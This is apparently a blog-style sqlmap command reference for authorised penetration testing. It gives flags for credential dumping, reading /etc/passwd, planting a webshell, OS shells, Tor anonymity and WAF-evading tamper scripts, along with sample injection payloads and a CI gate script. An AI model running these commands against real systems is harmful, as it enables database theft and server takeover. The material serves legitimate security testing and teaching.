sqlmap ships with hundreds of flags. I use maybe forty of them regularly. This is the field reference for the ones that matter, grouped by the task I am trying to accomplish, with a short note on when each one is worth reaching for.
If you are new to sqlmap, the sqlmap tutorial walking through an attack against a vulnerable app is the right next stop. If you are comparing tools, the best SQL injection tools list for 2026 covers the alternatives. For the underlying mechanics, the SQL injection deep dive has the full taxonomy.
Authorisation required
Use these techniques only on systems you own or have written authorisation to test. Unauthorised access to a computer system is a crime in nearly every jurisdiction (US: Computer Fraud and Abuse Act. UK: Computer Misuse Act 1990. EU: Directive 2013/40/EU). This article assumes a sanctioned engagement or a lab environment you control. If you do not have permission, do not run these commands against anything you find on the internet.
sqlmap Command Reference
Every flag organised by task. Copy and adapt.
Target specification

-u 'https://target.example/product?id=1'
    Single URL with query string. Every parameter is tested unless -p or --param-filter narrows the set.
-r request.txt
    Load a saved raw HTTP request. Captured from DevTools or any intercepting proxy. Preserves method, headers, cookies and body.
--har=traffic.har
    Logs sqlmap's own HTTP traffic to a HAR file for later review (the HAR counterpart of -t). This is output, not input: sqlmap does not read HAR exports from DevTools. Convert the entry you want into a raw request and use -r.
-l burp.xml
    Parse a Burp or WebScarab proxy log and test every request in it.
-m urls.txt
    Multiple URLs from a file, one per line.
-g 'inurl:product.php?id='
    Google dork to find targets. Use carefully: rate limits, legality, and you hold no authorisation for whatever it returns.
--data='username=foo&password=bar'
    POST body. Implies POST unless --method says otherwise. Use * to mark explicit injection points.
-p id,name
    Test only these parameters. Cuts noise on multi-param endpoints.
--skip=token,csrf
    Skip parameters likely to be tokens or anti-CSRF noise.
Request shaping

--cookie='session=abc; PHPSESSID=xyz'
    Send cookies. Required for any authenticated endpoint.
--cookie-del=';'
    Cookie delimiter override. Default is ';'.
--headers='X-Forwarded-For: 127.0.0.1\nX-API-Key: foo'
    Add custom headers (\n separator). Useful for header-based injection points; put a * in the value to force sqlmap to test that header.
-H 'Authorization: Bearer eyJ...'
    Single extra header, repeatable. Cleaner than --headers for one or two values.
--user-agent='Mozilla/5.0 ...'
    Override the default sqlmap User-Agent (sqlmap/1.x ...), which every WAF signatures.
--random-agent
    Pick one random UA from sqlmap's bundled data/txt/user-agents.txt and use it for the whole run.
--referer='https://target.example/'
    Set Referer. Some apps validate it.
--auth-type=Basic --auth-cred='user:pass'
    HTTP Basic, Digest or NTLM authentication (recent versions also take Bearer).
--proxy='http://127.0.0.1:8080'
    Route through a proxy. 8080 is Burp's default listener, handy for inspecting what sqlmap actually sends.
--method=PUT --data='{...}'
    Custom HTTP method (REST APIs).
Detection tuning

--level=5
    How thorough the test is, 1 (default) to 5. Higher levels add payloads and injection points: 2 adds Cookie values, 3 adds User-Agent and Referer, 5 adds the Host header and every boundary sqlmap knows.
--risk=3
    How dangerous the payloads are, 1 (default) to 3. 2 adds heavy time-based queries; 3 adds OR-based tests, which can turn an injectable UPDATE or DELETE into one that touches every row. Use 3 only where you can restore the data.
--technique=BEUSTQ
    Restrict techniques. B=Boolean-blind, E=Error-based, U=Union, S=Stacked queries, T=Time-blind, Q=Inline queries. Default tests all.
--time-sec=10
    Sleep duration for time-based payloads (default 5). Increase on noisy or slow networks or you get false negatives.
--union-cols=10
    Column count (or range, e.g. 10-14) to try for union-based tests. Skips the auto-detect phase if you already know it.
--dbms=mysql
    Skip DBMS fingerprinting. Faster and avoids false positives if you already know the backend.
--os=linux
    Hint the OS for file-system and OS-command payloads.
--prefix="'" --suffix="-- -"
    Override the payload boundaries. Useful in awkward injection contexts (inside a function call, a quoted string, a comment).
--string='Welcome back'
    String that appears only in the true-condition page. Tells boolean-blind what to look for when the automatic page diff is unreliable.
--not-string='Invalid'
    String that appears only in the false-condition page (inverse of above).
--code=200
    HTTP status code that marks the true condition.
DBMS fingerprinting and info

--banner
    DBMS version banner.
--current-user
    Currently connected DB user.
--current-db
    Currently selected database.
--hostname
    DB server hostname.
--is-dba
    Is the current user a DBA? Decides whether the OS and file payloads are realistic at all.
--privileges -U username
    Privileges of a specific user (or the current user if -U is not set).
--roles
    Roles of the current user (most useful on Oracle).
Enumeration

--tables -D dbname
    List tables in a database.
--columns -D dbname -T tablename
    List columns in a table.
--schema
    Full schema (all DBs, all tables, all columns). Heavy; combine with --exclude-sysdbs.
--count -D dbname -T tablename
    Row count without dumping.
--search -T users
    Find tables matching a name across all DBs.
--search -C password,passwd,pwd
    Find columns matching common credential names.
Dumping data

--dump -D dbname -T tablename
    Dump all rows of a table.
--dump -D dbname -T users -C username,password
    Dump specific columns only. Less noise, and less client data pulled onto your machine.
--dump-all --exclude-sysdbs
    Dump everything except system databases. Rarely defensible on a real engagement; scope the dump.
--start=1 --stop=100
    Row range. Pagination when the table is huge, and a cheap way to prove access without taking the whole table.
--where="username='admin'"
    WHERE clause filter. Target a specific row.
--sql-query='SELECT version()'
    Run arbitrary SQL. Sometimes faster than the enumeration flags for one-off queries.
--sql-shell
    Interactive SQL prompt through the injection point.
File system access

--file-read=/etc/passwd
    Read a file from the DB server. On MySQL this needs the FILE privilege and a secure_file_priv setting that allows the path; PostgreSQL and MSSQL need superuser/sysadmin-level rights.
--file-write=local.php --file-dest=/var/www/html/shell.php
    Write a local file to the DB server's filesystem. The DB process needs write access to the destination (and, on MySQL, secure_file_priv must permit it). A write into the webroot is a webshell.
--common-files
    sqlmap has no wildcard file search. The nearest thing is --common-files, which brute-forces a bundled list of well-known paths through --file-read on the backends that support it.
OS command execution

--os-cmd='whoami'
    Run a single OS command on the DB server. Needs DBA rights and a usable mechanism (xp_cmdshell on MSSQL, a sqlmap-uploaded UDF library on MySQL/PostgreSQL).
--os-shell
    Interactive OS shell through the same mechanism.
--os-pwn
    Try for a Meterpreter session via UDF or stored-procedure tricks. Needs a local Metasploit (--msf-path). Lab use.
Session, speed, and output

--batch
    Non-interactive, take all defaults. Required for CI or scripted use.
--threads=10
    Concurrency, 1 (default) to 10. Higher is faster but noisier; time-based blind retrieval is forced back to a single thread.
-v 3
    Verbosity 0 to 6: 1 is the default, 2 debug, 3 shows injected payloads, 4 shows HTTP requests, 5 adds response headers, 6 adds response bodies.
--flush-session
    Discard cached state for this target. Start fresh.
--fresh-queries
    Ignore cached query results and re-run the queries while keeping the rest of the session (lighter than --flush-session).
-o
    Turn on all optimisations (--keep-alive, --null-connection, --threads=3 unless already set higher).
--output-dir=./out
    Where to save the session, log, and dumps. Default is ~/.local/share/sqlmap/output (older releases used ~/.sqlmap/output).
--dump-format=CSV
    Output format: CSV (default), HTML, or SQLITE.
Anonymity

--tor
    Route through Tor. Requires a local Tor SOCKS listener (default 127.0.0.1:9050).
--tor-port=9050
    Override the Tor port.
--tor-type=SOCKS5
    HTTP, SOCKS4, or SOCKS5.
--check-tor
    Verify via check.torproject.org that requests actually exit through Tor before testing. Use this; it is the only step that proves the target sees a Tor exit and not your own address.
--delay=2
    Seconds between requests. Slow down to look human and stay under rate limits.
--timeout=30
    Request timeout in seconds (default 30).
--retries=3
    Retries on timeout or connection error (default 3).
Evasion and tamper

--tamper=between,randomcase,space2comment
    Apply tamper scripts to obfuscate payloads. Comma-separated chain, applied in each script's priority order; a path to your own script works too.
--skip-waf
    Skip the heuristic WAF/IPS detection step. Faster on targets where you already know what is in front.
--identify-waf
    Dropped in the 1.3.x line. Current versions run the identYwaf heuristics automatically when a WAF is suspected (--skip-waf turns that off); to fingerprint the product on its own, run the standalone identYwaf tool.
--hpp
    HTTP parameter pollution. Splits the payload across duplicate parameters; depends on the backend taking the last (or concatenated) value.
--chunked
    Send the POST body with Transfer-Encoding: chunked. Some WAFs do not reassemble it correctly.
--null-connection
    Use HEAD (or Range) requests and compare Content-Length instead of bodies for true/false detection. Faster, sometimes evades content-based inspection; only works when true and false pages differ in length.
Useful tamper scripts (use with --tamper)

between
    Replaces > with NOT BETWEEN 0 AND # and = with BETWEEN # AND #. Bypasses filters blocking > and =.
space2comment
    Replaces spaces with /**/. Bypasses naive space-blocking filters.
space2plus
    Replaces spaces with +. URL-encoded space alternative.
randomcase
    Random case for keywords: UnIoN sElEcT. Bypasses case-sensitive blacklists.
charencode
    URL-encodes every character of the payload.
charunicodeencode
    Unicode-URL-encodes the payload (%u0053...). Decoded by IIS/ASP.NET, ignored by most other stacks.
apostrophenullencode
    Replaces ' with %00%27. Some WAFs miss the null byte.
equaltolike
    Replaces = with LIKE. Bypasses = blacklists.
ifnull2ifisnull
    MySQL-specific: IFNULL(a,b) → IF(ISNULL(a),b,a).
modsecurityversioned
    Wraps the whole query in a MySQL versioned comment (/*!30874 ... */). Old ModSecurity bypass.
halfversionedmorekeywords
    Adds a versioned comment (/*!0) before each keyword. MySQL only.
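A tamper script is just a Python module exposing tamper(payload, **kwargs) that returns the rewritten payload; sqlmap loads it by name from its tamper/ directory or by file path. The script below is an added example written for this article, not one of sqlmap's bundled scripts. It stacks the between (for >), equaltolike and space2comment rewrites listed above into one deterministic pass, so you can see what a chain does to a payload before anything is sent. The file name, between_like_comment.py, is an assumption; pick any name.

```python
"""Custom sqlmap tamper script (added example, not a bundled sqlmap script).

Save as tamper/between_like_comment.py (name is arbitrary) and load it with
    sqlmap -r req.txt --tamper=tamper/between_like_comment.py
sqlmap calls tamper(payload, **kwargs) for every payload it is about to send
and uses the return value instead. Three rewrites, applied in this order:
  1. '>' comparisons       -> ' NOT BETWEEN 0 AND '  (what bundled 'between' does for '>')
  2. '=' comparisons       -> ' LIKE '               (what 'equaltolike' does)
  3. spaces outside quotes -> '/**/'                 (what 'space2comment' does)
"""
import re

try:
    # Present when sqlmap imports the script; decides where this script runs
    # when several --tamper scripts are chained.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:  # stand-alone use (tests, manual experiments)
    __priority__ = 0

# Right-hand side of a comparison: number, single-quoted string, or FUNC(number).
_RHS = r"(\d+|'[^']*'|\w+\(\d+\))"
_GT = re.compile(r"\s*>\s*" + _RHS)
_EQ = re.compile(r"\s*=\s*")


def dependencies():
    """sqlmap calls this once at load time; bundled scripts print DBMS caveats here."""
    pass


def gt_to_not_between(payload):
    """'2>1' -> '2 NOT BETWEEN 0 AND 1' (same truth value for non-negative operands)."""
    return _GT.sub(r" NOT BETWEEN 0 AND \1", payload)


def eq_to_like(payload):
    """'1=1' -> '1 LIKE 1'. Same result for plain values; LIKE also treats % and _ as wildcards."""
    return _EQ.sub(" LIKE ", payload)


def spaces_to_comments(payload):
    """Replace spaces with /**/, but leave spaces inside single-quoted literals alone.

    Quote tracking only starts after the first space: a payload such as
    1' AND ... opens with the quote that closes the application's string,
    and counting that one would invert the in/out-of-quote state.
    """
    out, in_quote, seen_space = [], False, False
    for ch in payload:
        if not seen_space:
            if ch == " ":
                seen_space = True
                out.append("/**/")
            else:
                out.append(ch)
            continue
        if ch == "'":
            in_quote = not in_quote
        out.append("/**/" if ch == " " and not in_quote else ch)
    return "".join(out)


def tamper(payload, **kwargs):
    """Entry point sqlmap expects. kwargs carries e.g. request headers; unused here."""
    if not payload:
        return payload
    return spaces_to_comments(eq_to_like(gt_to_not_between(payload)))


if __name__ == "__main__":
    for p in ("1 AND 2>1", "1 AND 1=1", "1' AND name='a b' AND 'x'='x"):
        print(p, "->", tamper(p))
```

Run it directly to see the rewritten forms, then pass it to --tamper. Keep the comparison rewrites before the space rewrite, as here: once spaces have become /**/ the regexes for > and = no longer see the whitespace they key on.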
req.txt is a raw HTTP request file: method line, headers, blank line, body. Most of my commands use -r req.txt because it carries the entire request shape (method, headers, cookies, body) without re-typing. Here is what it actually looks like:
GET /product?id=1 HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiJ9...; PHPSESSID=q9k2...
Connection: close
POST requests look the same with the method and body added:
POST /login HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Cookie: PHPSESSID=q9k2...
Connection: close

username=admin&password=test
No special markers, no per-parameter annotations. sqlmap tests every parameter it finds in the request unless you restrict with -p. Mark a specific injection point with * only if you want to force sqlmap there.
You do not need Burp Suite for this. The DevTools built into Chrome and Firefox can produce everything sqlmap needs. One caveat first: sqlmap does not read HAR files. Its --har flag writes sqlmap's own traffic to a HAR for later review, so a HAR exported from DevTools has to be turned into a raw request before -r can use it. The HAR is JSON, and each entry's request object carries the method, URL, headers and postData, which is all req.txt needs, so the conversion is mechanical. Two paths, easiest first:
Easiest: Copy as cURL and convert.
Open DevTools: F12 on Windows/Linux, Cmd+Option+I on macOS.
Open the Network tab. Enable Preserve log so a navigation does not wipe the captured requests.
Trigger the target request in the page (click the link, submit the form, hit the API).
Right-click the request and pick Copy as cURL from the copy submenu (both browsers have it). The cURL command contains the URL, every header, and the body.
Run it through a converter (curlconverter --language http <command> from npm, or any cURL-to-HTTP tool) and save the output as req.txt. Or just read it and assemble req.txt by hand: cURL's -H "Foo: bar" flags become header lines verbatim, --data 'x=y' becomes the body, and the URL gives you the method line and the Host header.
If you prefer to assemble req.txt yourself from the Headers panel (worth the extra step when you want to hand-edit headers or insert a * injection-point marker):
Same DevTools / Network tab setup.
Click the request you want to capture. In Chrome open the Headers tab inside that request's panel; in Firefox the Headers tab is the default.
Copy the request method line and every request header into a text file. The browsers display them in the right order already. If the site was served over HTTP/2 or HTTP/3 you will see pseudo-headers starting with a colon (:authority, :method, :path, :scheme); drop those, write a Host: line from :authority, and put HTTP/1.1 on the request line, because that is the format -r parses.
Add a blank line, then the request body (if any). For POST forms that is the URL-encoded body. For JSON APIs it is the raw JSON.
Save as req.txt. Use with -r req.txt in every example below.
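The HAR-to-req.txt conversion above is short enough to script. The converter below is an added example for this article, not part of sqlmap; it picks one entry out of a DevTools export and writes the HTTP/1.1 request file that -r expects, dropping HTTP/2 pseudo-headers and regenerating Host and Content-Length. The sample HAR embedded in it is constructed for illustration, and the script name har2req.py is an assumption.

```python
"""Convert one entry of a DevTools HAR export into a raw request file for sqlmap -r.

Added example for this article, not part of sqlmap (whose --har flag writes a HAR,
it does not read one). Usage:
    python3 har2req.py traffic.har /login > req.txt
The second argument is a substring of the request URL; the first matching entry wins.
"""
import json
import sys
from urllib.parse import urlencode, urlsplit

# Regenerated from the URL and body, so whatever the browser recorded is dropped.
_REGENERATED = {"host", "content-length"}


def har_entry_to_request(entry):
    """Build HTTP/1.1 request text from a HAR entry (uses entry["request"])."""
    req = entry["request"]
    parts = urlsplit(req["url"])
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    # Always emit HTTP/1.1: Chrome records h2/h3 and exports ":authority"-style
    # pseudo-headers, which sqlmap's request parser does not understand.
    lines = [f"{req['method']} {target} HTTP/1.1", f"Host: {parts.netloc}"]
    for h in req.get("headers", []):
        if h["name"].startswith(":") or h["name"].lower() in _REGENERATED:
            continue
        lines.append(f"{h['name']}: {h['value']}")
    post = req.get("postData") or {}
    body = post.get("text")
    if body is None and post.get("params"):
        # Some exports carry only the parsed form fields, not the raw body.
        body = urlencode([(p["name"], p.get("value", "")) for p in post["params"]])
    body = body or ""
    if body:
        lines.append(f"Content-Length: {len(body.encode('utf-8'))}")
    # Headers, blank line, body: the layout sqlmap -r splits on.
    return "\n".join(lines) + "\n\n" + body


def find_entry(har, url_substring):
    """First HAR entry whose request URL contains url_substring, else None."""
    for entry in har["log"]["entries"]:
        if url_substring in entry["request"]["url"]:
            return entry
    return None


# Constructed sample shaped like a Chrome export of an HTTP/2 form post (not real traffic).
SAMPLE_HAR = {"log": {"entries": [{"request": {
    "method": "POST", "url": "https://target.example/login", "httpVersion": "h2",
    "headers": [
        {"name": ":method", "value": "POST"},
        {"name": ":authority", "value": "target.example"},
        {"name": "user-agent", "value": "Mozilla/5.0"},
        {"name": "content-type", "value": "application/x-www-form-urlencoded"},
        {"name": "content-length", "value": "28"},
        {"name": "cookie", "value": "PHPSESSID=q9k2"},
    ],
    "postData": {"mimeType": "application/x-www-form-urlencoded",
                 "text": "username=admin&password=test"},
}}]}}


if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8") as fh:
            har = json.load(fh)
        entry = find_entry(har, sys.argv[2])
        if entry is None:
            sys.exit(f"no request containing {sys.argv[2]!r} in {sys.argv[1]}")
    else:
        entry = SAMPLE_HAR["log"]["entries"][0]
    sys.stdout.write(har_entry_to_request(entry))
```

Run it without arguments to see what the constructed sample turns into. Header names come out in whatever case the browser recorded (lowercase for HTTP/2); HTTP headers are case-insensitive and sqlmap sends them as written, so that is harmless. If you want to force an injection point, add the * to the body or a header value in the generated file before passing it to -r.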
A few command lines I use as starting points and adapt from. The simplest ones take a -u URL directly for a quick probe; the rest use the captured request file from the section above.
The examples default to --random-agent because the literal sqlmap default User-Agent is signatured by every commercial WAF. A Googlebot UA usually gets you hard-blocked faster than the default; pick it only when you know the target trusts crawlers. The level, risk, thread and delay values below are starting points; tune them per target.
Simplest possible probe, just a URL with a query string. Good for a first sanity check before you bother capturing a request:
sqlmap -u 'https://target.example/product?id=1' --batch --random-agent --level=3 --risk=1
POST request with form data, no req.txt needed. sqlmap switches to POST because --data is set:
sqlmap -u 'https://target.example/login' \
    --data='username=admin&password=test' \
    --batch --random-agent --level=3 --risk=1
POST with a JSON body (REST APIs). Mark the explicit injection point with * when more than one field is parsable:
sqlmap -u 'https://api.target.example/v1/users/search' \
    --method=POST \
    --headers='Content-Type: application/json' \
    --data='{"q":"foo*","limit":10}' \
    --batch --random-agent --level=3 --risk=1
First pass against a captured request, light touch, defaults, see if anything is obvious:
sqlmap -r req.txt --batch --random-agent --level=1 --risk=1
Authenticated app, scoped to specific parameters (cookies come from req.txt):
sqlmap -r req.txt --batch -p user_id,product_id --random-agent \
    --level=3 --risk=1 --threads=4
Behind a WAF, slow and quiet (tamper chain layered on top, longer sleep so the delay does not mask time-based responses):
sqlmap -r req.txt --batch --random-agent --delay=2 --threads=1 \
    --tamper=between,randomcase,space2comment --time-sec=10
Through Tor, paranoid mode (covered in detail in the sqlmap with Tor and proxychains guide):
sqlmap -r req.txt --batch --tor --tor-type=SOCKS5 --check-tor \
    --random-agent --delay=2 --threads=1 --timeout=60
Once injection is confirmed, the typical enumeration sequence. These take database and table names that vary per target, so they stay non-interactive:
sqlmap -r req.txt --batch --dbms=mysql --current-db
sqlmap -r req.txt --batch --dbms=mysql --tables -D target_db
sqlmap -r req.txt --batch --dbms=mysql --columns -D target_db -T users
sqlmap -r req.txt --batch --dbms=mysql --dump -D target_db -T users -C username,password
--batch keeps it scriptable. --dbms=mysql skips the fingerprint step once you know the answer.
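Scriptable is only half of what CI needs: sqlmap's exit status does not tell you whether it found an injection, so a pipeline has to read the summary block sqlmap prints when it confirms one (the same block is appended to the log file under the output directory). The gate below is an added example, not sqlmap code. The output-dir path in its usage line and the sample log block are assumptions constructed for this article; the block's shape (Parameter, then Type/Title/Payload groups) is the one sqlmap prints.

```python
"""Gate a CI job on sqlmap's findings (added example, not sqlmap's own code).

With --batch sqlmap needs no input, but its exit code does not say whether it
found anything. What it does leave behind is the summary it prints when an
injection is confirmed, also appended to <output-dir>/<host>/log:

    sqlmap identified the following injection point(s) with a total of N HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: ...
        Payload: ...
    ---

This script parses that block and exits non-zero if any parameter is injectable.
Usage in a pipeline (paths assumed; match them to your --output-dir):
    sqlmap -r req.txt --batch --output-dir=./out ...
    python3 sqlmap_gate.py ./out/target.example/log
"""
import re
import sys

# "Parameter: id (GET)", "Parameter: User-Agent (User-Agent)", "Parameter: #1* ((custom) POST)"
_PARAM = re.compile(r"^Parameter: (?P<name>.+?) \((?P<place>.+)\)\s*$")
_TYPE = re.compile(r"^\s*Type: (?P<type>.+?)\s*$")
_TITLE = re.compile(r"^\s*Title: (?P<title>.+?)\s*$")


def parse_injection_points(log_text):
    """Return [{'parameter', 'place', 'techniques': [(type, title), ...]}, ...]."""
    points, current, pending_type = [], None, None
    for line in log_text.splitlines():
        m = _PARAM.match(line)
        if m:
            current = {"parameter": m["name"], "place": m["place"], "techniques": []}
            points.append(current)
            pending_type = None
            continue
        if current is None:
            continue  # nothing before the first Parameter: line matters
        m = _TYPE.match(line)
        if m:
            pending_type = m["type"]
            continue
        m = _TITLE.match(line)
        if m and pending_type:
            current["techniques"].append((pending_type, m["title"]))
            pending_type = None
    return points


def gate(log_text):
    """0 when nothing was found, 1 when at least one injection point exists."""
    return 1 if parse_injection_points(log_text) else 0


# Constructed sample in sqlmap's summary format (not a real scan result).
SAMPLE_LOG = """\
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4321=4321

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8765 FROM (SELECT(SLEEP(5)))abcd)
---
Parameter: User-Agent (User-Agent)
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: ') OR (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x71,(SELECT 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
---
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_LOG
    for p in parse_injection_points(text):
        print(f"{p['parameter']} ({p['place']}): " + "; ".join(t for t, _ in p["techniques"]))
    sys.exit(gate(text))
```

Run without arguments it reports two injection points from the constructed sample and exits 1, which is what you want a build step to do. Point it at the real log after a --batch run and the job fails only when sqlmap confirmed an injection; a run that found nothing leaves no Parameter: block and exits 0.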
For completeness, a short list of flags that exist but rarely earn their keep in real engagements:
--predict-output, slows things down without changing results in most cases.
--crawl=N, sqlmap's own crawler is weak. Use a real crawler (ffuf, hakrawler, gospider) then feed the URLs in.
--check-internet, adds round trips. If your connection is broken, you will know.
Every flag above is dual use. The same --dump that exfiltrates a production user table is the one I run against my own lab targets fifty times a week. Use these against systems you own or are explicitly authorised to test. See the authorisation block at the top and the legal-framing notes in the SQL injection deep dive .
What is the difference between --level and --risk in sqlmap?
Why does sqlmap not find an injection that I found manually?
Can I run sqlmap in CI to test my own apps?
Is the default sqlmap User-Agent really detected by every WAF?